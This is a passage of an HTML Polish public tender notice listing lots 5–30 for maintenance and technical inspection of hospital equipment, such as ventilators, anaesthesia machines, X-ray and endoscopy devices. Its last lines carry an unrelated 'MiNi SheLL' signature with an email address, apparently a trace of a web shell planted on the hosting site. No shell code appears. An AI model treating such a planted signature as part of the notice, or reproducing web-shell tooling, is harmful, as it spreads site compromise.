<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 1.5 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Siemens w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Siemens w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 1.6 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Viasys w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Viasys w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 1.7 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Wave w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- respiratory - Wave w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 1.8 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- aparaty do znieczuleń - Titus w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- aparaty do znieczuleń - Titus w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 1.9 - Stały nadzór techniczny, konserwacja, przegląd i naprawa aparatury ratującej życie- aparaty do znieczuleń - Datex w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nr 1.9	ratującej życie- aparaty do znieczuleń - Datex w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet Nr 1.10 - Stały nadzór techniczny, konserwacja, przegląd i naprawa wiertarek w Szpitalu przy ul. Św. Wojciecha 7;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa wiertarek w Szpitalu przy ul. Św. Wojciecha 7;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet Nr 1.11 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt do dializy w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt do dializy w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet Nr 1.12 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - USG w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - USG w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> pakiet Nr 1.13 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - analizatory w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - analizatory w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet Nr 1.14 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt pulmonologiczny różny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt pulmonologiczny różny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet Nr 1.15 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - laparoskopy, histeroskopy w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - laparoskopy, histeroskopy w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet Nr 1.16 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - gastroskopy, kolonoskopy w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - gastroskopy, kolonoskopy w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet Nr 1.17 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt różny w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt różny w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet Nr 1.18 - Stały nadzór techniczny, konserwacja, przegląd i naprawa - Maceratory w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa - Maceratory w Szpitalu przy ul. Mącznej 4, w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet Nr 1.19 - Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt okulistyczny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stały nadzór techniczny, konserwacja, przegląd i naprawa sprzętu diagnostycznego - sprzęt okulistyczny w Szpitalu przy ul. Mącznej 4, w Poradni Specjalistycznej przy ul. Słowackiego 19,  w Szpitalu przy ul. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet Nr 1.20  - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg- Philips w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg- Philips w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet Nr 1.21 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg - TMS w Szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt rtg - TMS w Szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet Nr 1.22 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Mammograf w szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Mammograf w szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet Nr 1.23 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - VISION w Szpitalu przy ul. Mączna 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - VISION w Szpitalu przy ul. Mączna 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet Nr 1.24 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Siemens w Szpitalu przy ul. Mącznej 4 oraz przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Siemens w Szpitalu przy ul. Mącznej 4 oraz przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet Nr 1.25 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - BENNET w szpitalu przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - BENNET w szpitalu przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet Nr 1.26 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - strzykawka automatyczna w szpitalu przy ul. Mącznej 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - strzykawka automatyczna w szpitalu przy ul. Mącznej 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet Nr 1.27 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - ARCOVIS, COMPACT, HELIODENT w szpitalu przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - ARCOVIS, COMPACT, HELIODENT w szpitalu przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet Nr 1.28 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - OPERA w szpitalu przy ul. Św. Wojciecha.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - OPERA w szpitalu przy ul. Św. Wojciecha.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet Nr 1.29 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - DRS w szpitalu przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - DRS w szpitalu przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet Nr 1.30 - Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Wywoływarki, Ciemnia Automatyczna w szpitalu przy ul. Św. Wojciecha 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie przeglądów technicznych sprzętu diagnostycznego - sprzęt RTG - Wywoływarki, Ciemnia Automatyczna w szpitalu przy ul. Św. Wojciecha 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2, 50.42.12.00-4, 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com